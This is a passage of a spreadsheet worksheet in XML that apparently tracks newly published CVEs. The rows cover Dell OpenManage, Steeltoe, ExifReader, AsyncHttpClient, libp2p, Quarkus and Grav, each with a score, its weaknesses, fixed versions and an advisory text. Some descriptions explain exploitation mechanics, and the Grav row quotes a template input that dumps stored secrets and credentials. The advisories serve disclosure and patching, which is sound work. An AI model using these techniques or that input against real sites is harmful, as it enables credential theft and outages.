          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Filesystem access for attacker.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81481</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81515</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Eureka</t>
        </is>
      </c>
      <c r="M180" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, EurekaDiscoveryClient deserializes the registry response as one unit, and an unrecognized actionType or status, a non-Boolean isCoordinatingDiscoveryServer, or a nonnumeric timestamp can abort the entire response. A principal that can register or update an instance can cause all connected Steeltoe clients to receive an empty or stale instance list until the malformed registration is removed. The JsonInstanceInfoConverter, BoolStringJsonConverter, and LongStringJsonConverter parsing paths are affected. This issue is distinct from the earlier DataCenterInfo.name parsing vulnerability. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81515</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81516</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Consul</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, ConsulDiscoveryClient constructs ConsulServiceInstance objects by parsing each registration's secure metadata with a strict Boolean conversion. A principal that can register a Consul service can supply a secure value other than true or false, causing the exception from one instance to abort construction of the entire instance list and make the targeted service undiscoverable. When GetAllInstancesAsync enumerates all services, one malformed instance can abort enumeration across every service. The outage persists until the offending registration is removed. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81516</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85128</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>The Choose User Role at Registration WordPress plugin before 1.3.3 does not validate the role requested at registration against the roles an administrator chose to offer, allowing unauthenticated users to request any role, including administrator, and to be granted it once the request is approved. Exploitation requires the Choose User Role at Registration WordPress plugin before 1.3.3's role selection feature and public account registration to both be enabled.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85128</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85715</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>npm:exifreader</t>
        </is>
      </c>
      <c r="M183" s="5" t="inlineStr">
        <is>
          <t>4.41.1</t>
        </is>
      </c>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-789, CWE-835</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>ExifReader is a JavaScript Exif information parser. Prior to 4.41.1, ExifReader parses attacker-controlled HEIC or AVIF ISO-BMFF files in getItems() within src/image-header-iso-bmff-iloc.js and trusts iloc itemCount and extentCount values while allocating an extent object for every nested-loop iteration. When offsetSize, lengthSize, baseOffsetSize, and indexSize are zero, the extent fields consume no input bytes and the buffer offset does not advance, but the parser can still allocate up to itemCount multiplied by extentCount objects without an allocation budget. A small malicious iloc box can therefore cause hundreds of megabytes of heap growth or exhaust system memory, terminating a Node.js process and denying service to web, desktop, or mobile applications that parse untrusted images. The zero field widths are valid ISO-BMFF values indicating absent fields, so the vulnerable parser must bound work rather than relying on offset advancement. The issue is fixed in version 4.41.1.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85715</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85719</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.1.0 until 2.16.1 and 3.0.12, requests using an authenticated SOCKS proxy can expose the proxy's credentials to the origin because NettyRequestFactory and NettyRequestSender attach Proxy-Authorization without confirming that the request is being sent to an HTTP proxy. With preemptive proxy authentication, the header is attached to a plaintext HTTP request, exposing credentials such as directly reversible Basic credentials to the origin. With the default non-preemptive flow, a hostile origin can return a 407 response and ProxyUnauthorized407Interceptor sends the proxy credentials through the existing SOCKS tunnel, including NTLM, Kerberos, and SPNEGO credentials. Releases before 2.1.0 lack SOCKS proxy support. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85719</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85721</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M185" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, automatic response decompression on the HTTP/1.1 path uses ChannelManager.newHttpContentDecompressor() to install Http1ContentDecompressor without a cumulative output-size limit. A hostile or compromised server, or an attacker who can alter a response in transit, can send a small gzip, deflate, or snappy response that expands across chunks until the client exhausts its heap and raises OutOfMemoryError; brotli and zstd are also affected when their optional codecs are present. In versions 3.0.8 through 3.0.10, the HTTP/2 decompressor is also unbounded, so switching protocols does not mitigate the issue on those releases. A limit applied to each decode call is insufficient because the response can be delivered as many small chunks, so the fixed implementation tracks total decompressed bytes for the whole response. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85721</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85917</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85917</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86038</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/gossipsub</t>
        </is>
      </c>
      <c r="M187" s="5" t="inlineStr">
        <is>
          <t>16.0.5</t>
        </is>
      </c>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 15.0.0 until 16.0.5, @libp2p/gossipsub uses the default StrictSign policy in packages/gossipsub/src/utils/buildRawMessage.ts, where validateToRawMessage verifies a signature with attacker-controlled msg.key but skips binding that key to msg.from when the claimed author is an RSA peer ID that does not inline a public key. An unauthenticated attacker can place a victim RSA peer ID in msg.from, sign the message with the attacker's private key, and supply the attacker's public key in msg.key, causing the message to be accepted and propagated as authored by the victim. Applications that trust message.from for validators, authorization, accounting, moderation, reputation, or audit logging can process attacker-controlled data under false origin attribution. The issue is fixed in version 16.0.5.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86038</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86040</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-770</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to 11.0.26, @libp2p/floodsub accepts unauthenticated RPC frames on /floodsub/1.0.0 through PeerStreams.attachInboundStream in packages/floodsub/src/peer-streams.ts without protobuf element limits, then processRpc and processRpcSubOpt in packages/floodsub/src/floodsub.ts synchronously process the subscriptions array without a per-frame cap. A single bounded-size frame can decode into millions of empty subscription entries that block the event loop, while hundreds of thousands of unique-topic SUBSCRIBE entries allocate PeerSet objects in this.topics that are not removed after peer removal or stop. Empty entries cause CPU exhaustion but do not grow this.topics; persistent memory growth requires unique topics. The subscription path bypasses message signature validation and the message-only processing queue, allowing a remote peer to cause sustained CPU denial of service, memory exhaustion, out-of-memory termination, and node unavailability. The issue is fixed in version 11.0.26.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86040</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87742</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in quarkus-websockets-next. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by streaming messages over a single connection faster than the application can process them. Due to unbounded message buffering and a lack of read backpressure, this rapidly exhausts heap space, leading to a java.lang.OutOfMemoryError that crashes the Java Virtual Machine (JVM).</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87742</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92916</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Grav is a flat-file CMS. In Grav 1.7.0 through 1.7.53.2 and 2.0.0 through 2.0.21, when the debugger is enabled (system.debugger.enabled: true, which is not the default), the Clockwork profiler endpoint is exposed without authentication: InitializeProcessor::handleDebuggerRequest() intercepts any path containing /__clockwork/ during bootstrap and passes it to Debugger::debuggerRequest(), which performs no user lookup, IP restriction, or Clockwork authenticator check, and also supports anonymous pagination over the entire stored history. With the shipped censored: false default, each stored record contains raw request cookies (including Grav's session cookie, whose value is the PHP session id, allowing an attacker to resume another user's session, including an authenticated admin's), the full parsed request body (Grav's login form posts data[username]/data[password], so passwords are stored in plaintext because Clockwork's password filter only inspects top-level keys), and the site's entire system and plugin configuration, including operator-saved secrets such as SMTP credentials, third-party API keys, and licence keys. Authorization and X-API-Token headers are stored even when censored: true. On Grav 2.0, setting provider: debugbar does not avoid the issue because Grav forces the Clockwork provider for requests preferring a JSON response. The issue is fixed in 1.7.53.4 and 2.0.22, which restrict /__clockwork/ to server-local requests or requests presenting the new system.debugger.token secret and strip cookies and credential headers from stored records. Workarounds include setting debugger.enabled: false or blocking /__clockwork/ at the web server or CDN.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92916</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92917</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Grav is a flat-file CMS. In versions 2.0.0-rc.1 through 2.0.21, the Twig content sandbox fails to restrict the dump and serialize filters (print_r, vardump, json_encode, yaml_encode, string): GravExtension::assertSandboxDumpSafe() determines sandbox state by calling SandboxExtension::isSandboxed() without a Source argument, which reports only the global sandbox flag that Grav never enables, so the guard added in GHSA-mc5q-6hpj-rp7j never executes. As a result, an authenticated user with page-edit rights can render {{ config|print_r }} in page content with Twig processing enabled and dump Grav's entire merged configuration — print_r reflects the real Config object held in a private property of the SandboxConfig facade, bypassing its path redaction — exposing plugin secrets such as SMTP credentials, API tokens, webhook secrets and cache backend passwords. Grav 1.7 is not affected because it ships no Twig content sandbox. The issue is fixed in 2.0.22, where the affected filters are registered with Twig's needs_is_sandboxed flag.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92917</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92942</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
